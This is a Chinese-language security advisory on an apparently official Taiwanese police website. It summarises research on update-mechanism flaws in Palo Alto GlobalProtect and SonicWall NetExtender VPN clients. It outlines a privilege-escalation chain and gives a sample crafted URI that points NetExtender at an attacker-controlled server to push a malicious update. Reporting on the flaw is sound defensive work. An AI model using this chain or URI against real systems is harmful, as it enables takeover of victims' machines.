您的瀏覽器不支援JavaScript功能,若網頁功能無法正常使用時,請開啟瀏覽器JavaScript狀態
進入內容區塊

內政部警政署保安警察第一總隊全球資訊網

:::

資安訊息

發布日期:113-12-27

發布單位:保安警察第一總隊

企業 VPN 更新機制遭攻破,研究人員揭露權限提升攻擊鏈
企業 VPN 更新機制遭攻破,研究人員揭露權限提升攻擊鏈

資安研究人員近期披露了影響企業級 VPN 解決方案的重大安全漏洞,涉及 Palo Alto Networks 和 SonicWall 兩家廠商的用戶端軟體。這些漏洞主要存在於更新機制中,攻擊者可藉此在受害者系統上獲取最高權限,對企業資安造成嚴重威脅。
攻擊者可利用這些漏洞建構一個完整的攻擊鏈。首先,攻擊者會架設一個惡意的 VPN 伺服器,並透過社交工程手法誘使目標使用者連接。一旦使用者連接到惡意伺服器,攻擊者就能夠獲取使用者的登入憑證。接著,攻擊者可以利用 PanGPS 服務的漏洞在系統中植入惡意根憑證。當該憑證被系統信任後,攻擊者就能夠簽署惡意的更新套件,而這些套件將以系統最高權限執行,在 Windows 系統上是 SYSTEM 權限,在 macOS 上則是 root 權限。
SonicWall NetExtender 中發現的 CVE-2024-29014 漏洞同樣涉及更新機制的問題。該漏洞存在於終端點控制(EPC)用戶端的更新過程中,由於更新套件的簽章驗證不完整,加上特權服務在處理更新時缺乏額外的安全檢查,使得攻擊者有機可趁。
特別值得注意的是 NetExtender 的自定義 URI 處理機制可能被攻擊者濫用。攻擊者可以通過構造特製的 URI(例如 smaconnect://connect?server=攻擊者伺服器&user=受害者)來強制 NetExtender 用戶端連接到惡意伺服器。一旦建立連接,攻擊者就能夠提供惡意的 EPC 更新套件,這些套件將以 SYSTEM 權限執行,從而獲取系統的完整控制權。

資料來源:資安人INFO SECURITY